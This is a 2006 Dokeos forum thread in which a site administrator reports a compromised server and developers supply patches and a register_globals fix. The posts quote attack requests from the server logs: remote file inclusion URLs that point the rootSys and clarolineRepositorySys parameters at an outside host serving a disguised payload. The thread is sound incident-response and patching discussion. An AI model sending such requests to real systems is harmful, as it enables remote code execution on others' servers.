Dokeos Forum

vianney · Joined: 09 Feb 2006 Posts: 13

Is there a known security vulnerability with
/claroline/exercice/testheaderpage.php?rootSys ?

My server has been kacked using this URL
/claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&c etc.

on Dokeos 1.6.2

Thank you for your help.

pcool · Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University

This is indeed a security hole. You can expect a new dokeos version tomorrow.

If you want to fix this already you have to do the following:

open inc/claro_init_global.inc.php

find the 4 occurrences of

if(!isset($_SESSION[$key]) && $key != 'includePath')

replace these 4 occurrences into

if(!isset($_SESSION[$key]) && $key != 'includePath' && $key
!= 'rootSys' && $key!= 'clarolineRepositorySys' && $key!= 'lang_path' &&
$key!= 'extAuthSource' && $key!= 'thisAuthSource' && $key!=
'main_configuration_file_path' && $key!= 'phpDigIncCn' && $key!= 'drs')

vianney · Joined: 09 Feb 2006 Posts: 13

thank you very much

pcool · Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University

an alternative solution (but equally good and maybe easier to implement) (although I prefer the first solution)

add somewhere on the top of the page of claro_init_global.inc.php (solution by Olivier and René)

foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
{
unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake],$HTTP_POST_VARS[$dontfake]);
}

domifreitas · Joined: 18 Oct 2004 Posts: 650 Location: Portugal

Should we do the same upgrade for Dokeos community release 2.0.2?

turboke · Posted: Thu Apr 06, 2006 10:46 am Post subject:

roan · Posted: Thu Apr 06, 2006 11:43 am Post subject:

vianney · Joined: 09 Feb 2006 Posts: 13

pcool · Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University

can you post your claro_init_global.inc.php here so that we can verify if you applied the fix correctly.

vianney · Joined: 09 Feb 2006 Posts: 13

here it is :

pcool · Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University

your server probably has register_globals=on in php.ini
These should be set to off

You can also use the second approach in this case. Add to the top of claro_init_global.inc.php:
foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
{
unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake],$HTTP_POST_VARS[$dontfake]);
}

vianney · Joined: 09 Feb 2006 Posts: 13

I will try.
Actually, register_global is on.
Do "off" should or must be used for Dokeos ? I thought it was "should".

Actualy the 3rd hack, they like me :-(
it is quite different :

[06/Apr/2006:17:18:50 +0200] "GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://www.mptechno.cz/cse.gif?&c
etc

Is the new code OK for that too ?

Tripple · Joined: 29 Nov 2004 Posts: 395

I added the fix on my Dokeos 1.6.1 installation.
How do I know if I was hacked? Do I have to search my logfile for 'rootSys'?

roan · Posted: Thu Apr 06, 2006 9:57 pm Post subject:

Tripple · Joined: 29 Nov 2004 Posts: 395

roan · Posted: Thu Apr 06, 2006 10:17 pm Post subject:

vianney · Joined: 09 Feb 2006 Posts: 13

pcool · Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University

When register globals is set to on then the only hole that still exists is in resourcelinker.inc.php.
Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).
I noticed today that not all my fixes made it to the CVS (I have lost all my icons on my windows box so I could not see if the files were changed or not)

What I advise you is
1. set registerglobals to OFF
2. take the dokeos1.6.4 ZIP package and use this one to update your campus.

frmartens · Posted: Fri Apr 07, 2006 8:23 am Post subject:

pcool · Joined: 23 Jun 2003 Posts: 3466 Location: Ghent University

It's just a mean of packaging.
I manually added the corrected files to the zip file but couldn't do this for the tar.gz